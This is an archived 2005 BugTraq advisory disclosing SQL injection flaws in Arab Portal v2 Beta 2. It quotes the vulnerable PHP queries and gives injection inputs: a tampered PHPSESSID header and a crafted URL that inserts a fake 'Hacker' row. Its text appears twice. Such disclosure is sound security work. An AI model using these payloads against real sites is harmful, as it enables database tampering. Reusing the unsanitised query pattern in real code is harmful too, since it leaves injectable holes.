BugTraq
Back to list
|
Post reply
Arab Portal v2 Beta2 SQL Injections
Dec 11 2005 03:24PM
stranger-killer hotmail com
Hi .. This is small bug for Arab Portal System v2 Beta 2
File name :- global.php
Remote:- Yes
Credit :-
Devil-00
Messenger :- <devil-00 (at) s4a (dot) cc [email concealed]>
E-Mail :- <stranger-killer (at) hotmail (dot) com [email concealed]>
//--# Devil SQL Injection
/*
This SQL can do when :-
magic_quotes_gpc = Off
$session_id << Bad Var
Attacking :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5
Edit HTTPHeader [ PHPSESSID ] = SQL Injection
*/
$apt->query("DELETE FROM rafia_online WHERE onlineSID ='$session_id' or timestamp < $timeout");
#--//
//--# Devil SQL Injection
/*
Devil-00 .. devil-00 (at) s4a (dot) cc [email concealed]
This SQL can do when :-
magic_quotes_gpc = Off
$REQUEST_URI << Bad Var
$session_id << Bad Var
Attacking URL :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&
','010','Hacker','0')/*
SQL Well Be
INSERT INTO rafia_online (timestamp,onlineip,
onlinefile,onlinepage,onlineSID,user_online,useronlineid) VALUES ('1134309930','127.0.0.1','/Arab_Portal_v.2.0_beta_2/link.php',
'/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5','0202020','Hac
ker','0')/*','6038e5a71794874f0130af05ec05501b','Guest','0')
Onlines :-
Guest يتواجد في ---
Hacker يتواجد في ---
*/
$apt->query("INSERT INTO rafia_online (timestamp,
onlineip,
onlinefile,
onlinepage,
onlineSID,
user_online,
useronlineid)
VALUES ('$timestamp',
'$online_ip',
'$PHP_SELF',
'$REQUEST_URI',
'$session_id',
'$useronline',
'$useronlineid')");
#--//
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
File name :- global.php
Remote:- Yes
Credit :-
Devil-00
Messenger :- <devil-00 (at) s4a (dot) cc [email concealed]>
E-Mail :- <stranger-killer (at) hotmail (dot) com [email concealed]>
//--# Devil SQL Injection
/*
This SQL can do when :-
magic_quotes_gpc = Off
$session_id << Bad Var
Attacking :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5
Edit HTTPHeader [ PHPSESSID ] = SQL Injection
*/
$apt->query("DELETE FROM rafia_online WHERE onlineSID ='$session_id' or timestamp < $timeout");
#--//
//--# Devil SQL Injection
/*
Devil-00 .. devil-00 (at) s4a (dot) cc [email concealed]
This SQL can do when :-
magic_quotes_gpc = Off
$REQUEST_URI << Bad Var
$session_id << Bad Var
Attacking URL :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&
','010','Hacker','0')/*
SQL Well Be
INSERT INTO rafia_online (timestamp,onlineip,
onlinefile,onlinepage,onlineSID,user_online,useronlineid) VALUES ('1134309930','127.0.0.1','/Arab_Portal_v.2.0_beta_2/link.php',
'/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5','0202020','Hac
ker','0')/*','6038e5a71794874f0130af05ec05501b','Guest','0')
Onlines :-
Guest يتواجد في ---
Hacker يتواجد في ---
*/
$apt->query("INSERT INTO rafia_online (timestamp,
onlineip,
onlinefile,
onlinepage,
onlineSID,
user_online,
useronlineid)
VALUES ('$timestamp',
'$online_ip',
'$PHP_SELF',
'$REQUEST_URI',
'$session_id',
'$useronline',
'$useronlineid')");
#--//
[ reply ]